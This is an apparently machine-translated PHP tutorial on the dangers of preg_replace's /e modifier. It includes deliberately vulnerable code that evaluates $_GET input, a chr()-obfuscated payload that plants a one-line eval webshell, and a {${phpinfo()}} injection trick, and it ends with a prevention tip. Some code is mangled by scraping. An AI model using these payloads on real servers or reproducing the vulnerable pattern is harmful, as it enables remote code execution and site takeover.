Home >Backend Development >PHP Tutorial >Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)_PHP Tutorial

Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)_PHP Tutorial

WBOY
WBOYOriginal
2016-07-21 15:05:231190browse

preg_replace function prototype:

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

Special instructions:
/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreference replacement). Tip: Make sure that replacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace().
Example:

Copy code The code is as follows:

preg_replace (" /(]*>)/e",
"1.strtoupper(2).3",
$html_body);
?> ;


This will make all HTML tags in the input string uppercase.

Security threat analysis:
Usually the subject parameter is generated by the client, and the client may construct malicious code, for example:

Copy Code The code is as follows:

echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>


If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP code implement).
What happens if we submit the following code?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr( 112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47) .chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39) .chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr (101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr (84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39 ).chr(41).chr(59))
The plaintext corresponding to the ciphertext is: fputs(fopen(data/a.php,w), );
The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.

Another difficult example:

Copy code The code is as follows:

< ?
function test($str)
{
}
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test(" 1")', $_GET["h"]);
?>


Submit?h=[php]phpinfo()[/php], phpinfo() Will it be enforced?
Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time.
Is there any way to make it execute?


Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed.
Note: Functions enclosed in double quotes will not be executed and replaced.

Here we need to construct a special variable through {${}}, 'test("{${phpinfo()}}")', to achieve the effect of having the function executed (${ phpinfo()} will be interpreted and executed).
You can do the following test first:

Copy the code The code is as follows:

echo "{${phpinfo ()}}";


phpinfo will be executed successfully.

How to prevent this vulnerability?
Change 'test("1")' to "test('1')" so that '${phpinfo()}' will be treated as an ordinary string (variables in single quotes will not be processed).

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/327690.htmlTechArticlepreg_replace function prototype: mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit]) Special instructions: The /e modifier causes preg_replace() to treat the replacement parameter as...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn